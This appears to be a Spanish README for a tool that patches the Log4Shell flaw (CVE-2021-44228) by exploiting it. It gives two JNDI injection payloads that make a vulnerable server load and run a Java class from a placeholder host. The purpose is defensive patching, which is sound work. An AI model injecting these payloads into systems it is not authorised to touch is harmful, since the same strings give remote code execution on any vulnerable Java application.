
Hot-patch de CVE-2021-44228 explotando la propia vulnerabilidad.
Parche en caliente CVE-2021-44228 explotando la propia vulnerabilidad.
Inyecta el siguiente código en cualquier lugar probablemente vulnerable a CVE-2021-44228,
${jndi:ldap://your-own-server/patch}
Para prevenir el ataque MITM durante el proceso de parcheo, se recomienda el siguiente payload, pero con menor compatibilidad para versiones antiguas de Java,
${jndi:ldap://your-own-server/any_string_except_patch}
Descarga las últimas versiones
Especifica las variables de entorno del sistema LOG4J_HOTFIX_HTTP_PATH y LOG4J_HOTFIX_HTTPS_PATH si deseas alojar Hotfix.class en tu propio servidor
Ten en cuenta que Hotfix.java debe compilarse con JDK6 para máxima compatibilidad.